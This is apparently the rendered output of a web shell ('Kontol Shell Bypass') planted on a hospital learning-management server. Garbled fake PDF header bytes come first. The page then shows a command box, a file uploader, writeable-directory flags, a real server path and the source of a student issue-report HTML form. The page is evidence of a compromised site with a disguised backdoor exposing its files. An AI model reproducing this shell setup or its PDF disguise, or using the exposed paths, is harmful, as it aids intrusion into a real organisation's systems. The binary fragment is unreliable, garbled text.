%PDF- <> %âãÏÓ endobj 2 0 obj <> endobj 3 0 obj <>/ExtGState<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI] >>/Annots[ 28 0 R 29 0 R] /MediaBox[ 0 0 595.5 842.25] /Contents 4 0 R/Group<>/Tabs/S>> endobj ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<> endobj 2 0 obj<>endobj 2 0 obj<>es 3 0 R>> endobj 2 0 obj<> ox[ 0.000000 0.000000 609.600000 935.600000]/Fi endobj 3 0 obj<> endobj 7 1 obj<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI]>>/Subtype/Form>> stream

nadelinn - rinduu

Command :

ikan Uploader :
Directory :  /var/www/html/shardahospital.org/shardalms/student-panel/views_old/user/
Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 
Current File : /var/www/html/shardahospital.org/shardalms/student-panel/views_old/user/report_issue.html
<div class="container-fluid">
    <div class="row">
        <div class="col-md-12">
            <div class="application my-profile">
                <div class="my-profile-form tab-content">
                    <form id="issueForm" class="report-an-issue">
                        <input type="hidden" name="cat" id="cat">
                        <div class="heading text-center">
                            <h4>Report an Issue</h4>
                            <p>Submit your issue</p>
                        </div>		

                        <div class="form-group">
                            <span class="input input--yoshiko">
                                <label>Issue Type</label>
								<select class="arrow input__field input__field--yoshiko" name="cat_id" id="cat_id" ng-model="CR.data.cat_id" ng-change="CR.getCatIssues(CR.data.cat_id)">
                                    <option value="">Select Your Issue Type</option>
                                    <option value="{{r.id}}" ng-repeat="r in CR.issueCats">{{r.title}}</option>
                                </select>
                            </span>	
                        </div>								
                        <div class="clearfix"></div>

                        <div class="pd20">
                            <div ng-repeat="r in CR.issues">
                                <label><input type="radio" name="issue" value="{{r.title}}"> {{r.title}}</label>
                            </div>
                        </div>
      
                        <div class="form-group width29">
                            <span class="input input--yoshiko">
                                <label>Write your Issue</label>
								<textarea rows="5" class="input__field input__field--yoshiko" name="description" ng-model="CR.data.description" placeholder="Write Your Issue" /></textarea>
                            </span>	
                        </div>
						
                        <div class="clearfix"><br><br></div>												
                            
                        <div class="form-group width29">
                            <label>Upload the Issue file (PDF, JPG, GIF, PNG)</label>
                            <input id="file" type="file" name="file" onchange="check_file(this)" /> 
                        </div>									
                        
                        <p class="text-center">
                            <button type="button" class="button" ng-click="CR.submitIssue()">Send <i class="fa fa-angle-right" aria-hidden="true"></i></button>
                        </p>
                    </form>
                </div>
            </div>
            
            <div class="dashboard">
                <div class="heading">
                    <h4>Issue Raised</h4>
                </div>
                <div class="table-responsive" ng-if="CR.reportedIssues.length">          
                    <table class="table table-bordered">
                        <thead>
                          <tr>
                            <th>Discription</th>
                            <th class="w120">Date</th>
                            <th class="w120">Closed On</th>
                            <th class="w150">Curent Status</th>
                          </tr>
                        </thead>

                        <tbody>
                         <tr ng-repeat="r in CR.reportedIssues">
                            <td>
                                <div class="bold mb5">
                                    [{{r.cat}}]
                                    <a href="" ng-click="CR.detail(r.id)" class="text-info">{{r.issue}}</a>
                                    <a href="" ng-click="CR.detail(r.id)" class="text-warning"><i class="fa fa-comments"></i> {{r.noOfComments}}</a>
                                </div>
                                <div ng-bind-html="renderHtml(r.description)"></div>
                                <div class="pdT10" ng-if="r.fileUrl">
                                    <a href="{{r.fileUrl}}" target="_blank" style="color:#00bfff"><i class="fa fa-paperclip"></i> View Attachment</a>
                                </div>
                            </td>
                            <td>{{r.created}}</td>
                            <td>{{r.close_date}}</td>
                            <td><span class="{{r.status=='1'?'red':(r.status=='2'?'orange-clr':'green-clr')}}">{{r.status_text}}</span></td>
                          </tr>
                        </tbody>
                    </table>
                </div>
                <div ng-if="!CR.reportedIssues.length">No issue raised</div>
            </div>						
        </div>
    </div>
</div>


<!-- Deatil -->
<div class="modal fade" role="dialog" id="dtlModal">
    <div class="modal-dialog modal-lg">
        <div class="modal-content">
            <div class="modal-header">
                <button type="button" class="close" data-dismiss="modal" aria-hidden="true">&times;</button>
                <h4 class="modal-title">Issue Detail</h4>
            </div>
            
            <div class="modal-body">
                <div class="mb5">Applicant: <strong>{{CR.dtl.name}} [{{CR.dtl.mob}}] [{{CR.dtl.email}}]</strong></div>
                <div>Date: <strong>{{CR.dtl.created}}</strong></div>
                <hr>
                <div class="mb5"><strong>[{{CR.dtl.cat}}] {{CR.dtl.issue}}</strong></div>
                <div class="mb5">
                    Current Status: <span class="{{CR.dtl.status=='1'?'red':(CR.dtl.status=='2'?'orange-clr':'green-clr')}}">{{CR.dtl.status_text}}</span>
                </div>
                <div ng-bind-html="renderHtml(CR.dtl.description)"></div>
                <div class="pdT5" ng-if="CR.dtl.fileUrl">
                    <a href="{{CR.dtl.fileUrl}}" class="uc text-info" target="_blank" style="font-size:11px">
                        <i class="fa fa-paperclip"></i> View Attachment
                    </a>
                </div>
                <hr>

                <!-- Comments -->
                <div>
                    <h4 class="mb15">Comments <span class="badge badge-default"> {{CR.dtl.comments.length}} </span></h4>
                    <div class="clearfix"></div>
                    <div ng-if="CR.dtl.comments.length">
                        <ul class="chats">
                            <li class="mb10" ng-repeat="r in CR.dtl.comments">
                                <div>
                                    <div class="mb5" style="color:#777">
                                        <a href="javascript:;" class="name"> {{r.comment_by}} </a>
                                        <span class="datetime"> at {{r.created}} </span>
                                    </div>
                                    <div ng-bind-html="renderHtml(r.description)"></div>
                                    <!-- <div class="pdT5" ng-if="r.flg=='OUT'">
                                        <a href="" class="text-danger" ng-click="CR.deleteIssueComment(r.id)">
                                            <i class="fa fa-trash"></i> Delete
                                        </a>
                                    </div> -->
                                </div>
                            </li>
                        </ul>
                        <div class="clearfix"></div>
                    </div>
                    
                    <div class="chat-form">
                        <div class="input-cont">
                            <input class="form-control" type="text" placeholder="Type a message here..." ng-model="CR.yourComment">
                        </div>
                        <div class="btn-cont">
                            <span class="arrow"> </span>
                            <a href="" class="btn btn-primary" ng-click="CR.addComment()">
                                <i class="fa fa-check icon-white"></i>
                            </a>
                        </div>
                    </div>
                </div>
                <!-- / -->
            </div>

            <div class="modal-footer">
                <button type="button" class="btn dark btn-outline" data-dismiss="modal">Close</button>
            </div>
        </div>
    </div>
</div>

Kontol Shell Bypass